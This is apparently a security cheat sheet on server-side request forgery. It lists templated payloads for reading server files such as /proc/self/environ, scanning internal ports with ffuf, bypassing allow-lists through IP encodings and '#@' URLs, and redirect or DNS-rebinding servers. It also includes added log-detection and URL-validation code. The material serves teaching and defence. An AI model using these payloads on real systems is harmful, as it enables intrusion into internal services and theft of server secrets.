# SSRF

SSRF occurs when an application takes user-controlled input (a URL, GET/POST parameter, header, etc.) that is not properly validated and uses it to make an HTTP request to another internal or external resource on the user's behalf.

**Types**: In-Band (the fetched response is returned to the user) and Blind (the response is not returned; only side effects such as timing or an out-of-band callback show that the request was made).

## Payload

[URL validation bypass](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet)

### Remote files

{% code overflow="wrap" %}

```url
http://<TARGET>/load?q=http://<IP>:<PORT>
```

{% endcode %}

### Local files

{% code overflow="wrap" %}

```url
http://<TARGET>/load?q=file://<ABSOLUTE_PATH>
http://<TARGET>/load?q=file:///proc/self/environ  # environment variables of the server process (e.g. PWD)
```

{% endcode %}

### Port Scanning

{% code overflow="wrap" %}

```bash
for port in {1..65535}; do echo $port >> ports.txt; done  # wordlist with every TCP port, one per line
```

{% endcode %}

{% code overflow="wrap" %}

```bash
curl -i -s "http://<TARGET_IP>/load?q=http://127.0.0.1:1"
# note the response length for a closed port; that is the size to filter out with -fs
```

{% endcode %}

{% code overflow="wrap" %}

```bash
ffuf -w ./ports.txt:PORT -u "http://<TARGET_IP>/load?q=http://127.0.0.1:PORT" -fs 30
```

{% endcode %}
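On the defensive side, the port-scan pattern above is visible in the web server's access log: one client driving the fetch parameter through many loopback ports in a short time, plus `file://` requests. The following script is an added example (not part of the original page) that parses constructed combined-format log lines for the page's own `/load?q=` endpoint and flags non-HTTP schemes and internal port sweeps per client. The log lines, the endpoint path and the threshold are assumptions made for the example.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined format). One client walks
# loopback ports through /load?q=, another asks for file:///proc/self/environ.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /load?q=http://127.0.0.1:21 HTTP/1.1" 200 30
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /load?q=http://127.0.0.1:22 HTTP/1.1" 200 30
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /load?q=http://127.0.0.1:80 HTTP/1.1" 200 1024
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /load?q=http://127.0.0.1:443 HTTP/1.1" 200 30
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /load?q=http://127.0.0.1:3306 HTTP/1.1" 200 30
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /load?q=http://127.0.0.1:8080 HTTP/1.1" 200 30
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /load?q=https://example.com/logo.png HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /load?q=file:///proc/self/environ HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) (?P<size>\d+|-)$'
)

def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def fetched_target(path):
    """Return (scheme, host, port) of the URL the app was asked to fetch via ?q=, or None."""
    q = parse_qs(urlsplit(path).query).get("q")
    if not q:
        return None
    target = urlsplit(q[0])
    if not target.scheme:
        return None
    try:
        port = target.port            # ValueError for out-of-range ports
    except ValueError:
        port = None
    return target.scheme.lower(), (target.hostname or "").lower(), port

def is_internal_host(host):
    """True for loopback/private/link-local IP literals or 'localhost'.
    DNS names are not resolved in this log-side check."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local

def analyze(log_text, scan_threshold=5):
    """Return findings as (client, kind, detail) tuples.

    kind is 'non-http scheme' for file://-style fetches, or 'internal port scan'
    when one client hits at least scan_threshold distinct ports on one internal host.
    """
    ports_seen = defaultdict(set)
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        tgt = fetched_target(rec["path"]) if rec else None
        if not tgt:
            continue
        scheme, host, port = tgt
        if scheme not in ("http", "https"):
            findings.append((rec["client"], "non-http scheme", f"{scheme}://{host}"))
            continue
        if is_internal_host(host):
            ports_seen[(rec["client"], host)].add(port)
    for (client, host), ports in ports_seen.items():
        if len(ports) >= scan_threshold:
            detail = f"{host} ports={sorted(p for p in ports if p)}"
            findings.append((client, "internal port scan", detail))
    return findings

if __name__ == "__main__":
    for client, kind, detail in analyze(SAMPLE_LOG):
        print(f"{client:12} {kind:20} {detail}")
```

The threshold is deliberately low for the sample; in production, count distinct ports per client over a sliding window rather than over the whole file, and treat any `file://` (or other non-HTTP scheme) request as a high-severity event on its own.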

## Encoding IP

| Encoding | `127.0.0.1` written as |
| --- | --- |
| Abbreviations | `127.1` |
| [Decimal](https://www.ipaddressguide.com/ip) | `2130706433` |
| [Octal](https://www.browserling.com/tools/ip-to-oct) | `0177.0000.0000.0001` (`017700000001`) |

```url
http://127.0.0.1#@whitelist.net
http://127.0.0.1%23@whitelist.net
http://127.0.0.1%2523@whitelist.net
http://whitelist.net#@127.0.0.1
http://whitelist.net%23@127.0.0.1
http://whitelist.net%2523@127.0.0.1
```

## HTTP Redirection

Server redirection: host a server that answers with a 302 to the target, so that a validation check on the submitted URL passes while the application's HTTP client follows the redirect.

{% code overflow="wrap" %}

```bash
# minimal one-shot redirect; HTTP wants CRLF line endings and a blank line after the headers
echo -e "HTTP/1.1 302 Found\r\nLocation: <TARGET_SITE>\r\n\r\n" | nc -lnvp 80
```

{% endcode %}

{% code overflow="wrap" %}

```python
from flask import Flask, redirect

app = Flask(__name__)

@app.route('/')
def redirect_to_new_page():
    return redirect('<TARGET_SITE>', code=302)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```

{% endcode %}

{% code overflow="wrap" %}

```python
from flask import Flask, redirect, make_response

app = Flask(__name__)

@app.route('/')
def index():
    # Create a response with a redirect and set the desired content type.
    response = make_response(redirect('http://0.0.0.0/internal.php'))
    response.headers['Content-Type'] = 'image/png'
    return response

if __name__ == '__main__':
    app.run(debug=True)
```

{% endcode %}

## DNS Rebinding

Set up a DNS server that alternates between two IPs for the same name, so that the lookup done for validation and the lookup done for the actual request get different answers.\
Use [Rebinder](https://lock.cmpxchg8b.com/rebinder.html): enter the two IPs to alternate between and it gives you the domain to use.
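The sections on local files, IP encoding, HTTP redirection and DNS rebinding all describe ways a naive check on the submitted URL is sidestepped. The following validator is an added example (not code from the original page) showing the checks that close those gaps together: an allow-list of schemes and hostnames, parsing the authority with `urlsplit` so that the `#@` and `%23@` variants are judged on the host actually contacted, normalisation of decimal/octal/abbreviated IP spellings through `socket.inet_aton`, and a single DNS resolution whose result is pinned and rejected if any answer is internal. The caller must then connect to the pinned IP and must not follow redirects. The allow-list, the `demo_resolver` and its `DEMO_DNS` table are constructed for the example so it runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"whitelist.net"}  # constructed allow-list for this example

# Constructed DNS answers so the example runs offline. The second name returns one
# public and one internal record, the pattern a rebinding domain relies on.
DEMO_DNS = {
    "whitelist.net": ["93.184.216.34"],
    "rebind.example": ["93.184.216.34", "10.0.0.1"],
}

def demo_resolver(host, port, type=socket.SOCK_STREAM):
    """Stand-in for socket.getaddrinfo, returning the same tuple shape from DEMO_DNS."""
    if host not in DEMO_DNS:
        raise socket.gaierror(f"unknown host {host}")
    return [(socket.AF_INET, type, 6, "", (ip, port)) for ip in DEMO_DNS[host]]

class UnsafeURL(ValueError):
    pass

def is_blocked_ip(ip):
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified)

def parse_host(hostname):
    """Return an address object if hostname is any spelling of an IP literal, else None.

    ipaddress.ip_address() only accepts canonical text; the decimal (2130706433),
    octal (0177.0000.0000.0001, 017700000001) and abbreviated (127.1) spellings are
    normalised through socket.inet_aton, which accepts the same legacy forms that
    most HTTP client libraries do.
    """
    try:
        return ipaddress.ip_address(hostname)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(socket.inet_aton(hostname))  # packed 4 bytes
    except OSError:
        return None

def validate_and_pin(url, allowed_hosts=None, resolver=socket.getaddrinfo):
    """Validate url and return (hostname, pinned_ip, port), or raise UnsafeURL.

    Connect to pinned_ip (keeping hostname for the Host header / SNI) and do not
    follow redirects; otherwise a second lookup (rebinding) or a 3xx Location can
    swap in an internal address after this check has passed.
    """
    allowed_hosts = ALLOWED_HOSTS if allowed_hosts is None else allowed_hosts
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:              # rejects file://, gopher://, ...
        raise UnsafeURL(f"scheme not allowed: {scheme!r}")
    # .hostname is the authority's host: 'http://127.0.0.1#@whitelist.net' gives
    # 127.0.0.1 and 'http://whitelist.net#@127.0.0.1' gives whitelist.net.
    host = parts.hostname or ""
    if not host:
        raise UnsafeURL("missing host")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo in URL")          # the %23@ and %2523@ variants
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError as e:
        raise UnsafeURL(f"bad port: {e}")
    literal = parse_host(host)
    if literal is not None:                         # any IP literal sidesteps the allow-list
        raise UnsafeURL(f"IP literal not allowed: {host} -> {literal}")
    if host not in allowed_hosts:
        raise UnsafeURL(f"host not in allow-list: {host}")
    try:                                            # resolve exactly once
        answers = resolver(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror as e:
        raise UnsafeURL(f"resolution failed: {e}")
    ips = [ipaddress.ip_address(a[4][0]) for a in answers]
    if not ips:
        raise UnsafeURL("no addresses")
    for ip in ips:                                  # refuse if ANY answer is internal
        if is_blocked_ip(ip):
            raise UnsafeURL(f"{host} resolves to blocked address {ip}")
    return host, str(ips[0]), port

def check(url, **kw):
    """'OK host -> ip:port' or 'REJECT reason'; handy for logging and for the demo."""
    try:
        host, ip, port = validate_and_pin(url, **kw)
    except UnsafeURL as e:
        return f"REJECT {e}"
    return f"OK {host} -> {ip}:{port}"

if __name__ == "__main__":
    for u in ["http://whitelist.net/logo.png", "http://127.1/", "http://2130706433/",
              "http://0177.0000.0000.0001/", "http://127.0.0.1#@whitelist.net",
              "http://127.0.0.1%23@whitelist.net", "http://whitelist.net#@127.0.0.1",
              "file:///proc/self/environ"]:
        print(f"{u:40} {check(u, resolver=demo_resolver)}")
    print("http://rebind.example/", check("http://rebind.example/",
                                           allowed_hosts={"rebind.example"}, resolver=demo_resolver))
```

Note that `http://whitelist.net#@127.0.0.1` is accepted: the host actually contacted is `whitelist.net` and the fragment is never sent, which is exactly why the check has to be made on the parsed authority and not with a substring match on the raw string. The pinned IP is only useful if the HTTP client honours it; with `requests`, for instance, that means a custom adapter or a resolver hook rather than passing the original URL straight through.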

## Inconsistencies in URL Parsers

[A New Era of SSRF - Black Hat USA 2017](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf)

